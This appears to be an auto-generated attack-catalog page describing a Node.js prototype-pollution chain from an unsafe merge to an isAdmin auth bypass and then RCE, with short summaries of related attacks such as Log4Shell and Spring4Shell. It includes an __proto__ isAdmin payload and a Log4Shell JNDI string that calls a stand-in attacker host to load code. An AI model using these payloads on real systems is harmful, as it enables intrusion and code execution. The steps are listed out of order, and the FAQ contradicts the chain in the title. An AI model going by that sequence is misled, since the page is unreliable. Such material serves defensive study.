Server-side prototype pollution → auth bypass → RCE

§ Context

Assumed environment: Node.js app using lodash.merge / set-value / hoek / similar on a request body without sanitisation. Application reads booleans from plain objects with defaults.

§ Steps

1. 01
   Code execution on next spawn()Execution

   T1059— Command and Scripting Interpreter
2. 02
   Pollute child-process options gadgetExecution

   W-PROTOTYPE-SERVER— Server-Side Prototype Pollution → RCE

   execArgv / shell.

3. 03
   Pollute Object.prototype.isAdminExecution

   W-PROTOTYPE-SERVER— Server-Side Prototype Pollution → RCE

   {"__proto__":{"isAdmin":true}}

4. 04
   Find unsafe merge sinkReconnaissance

   W-RECON-FINGERPRINT— Tech Stack Fingerprinting
5. 05
   Reach admin pathPrivilege Escalation

   W-BFLA— Broken Function Level Authorization (API BFLA)

§ References

• T1059Command and Scripting Interpreter

§ Frequently asked

What is the "Server-side prototype pollution → auth bypass → RCE" attack path?

Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE. It chains 5 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Code execution on next spawn() (T1059) — a execution primitive. Assumed environment: Node.

What is the final impact of this kill-chain?

The final step lands on Reach admin path (W-BFLA), which falls under Privilege Escalation. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques2

  F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

• Shared techniques2

  Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

• Shared techniques2

  Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat

  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.

• Shared techniques2

  Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach

  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.

• Shared techniques2

  FortiGate SSL-VPN pre-auth RCE → config theft

  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.

• Shared techniques2

  JWT RS256 → HS256 algorithm confusion → admin

  Server verifies any algorithm declared in the JWT header. Sign an HS256 token using the public RSA key as the HMAC secret — server accepts it as legit.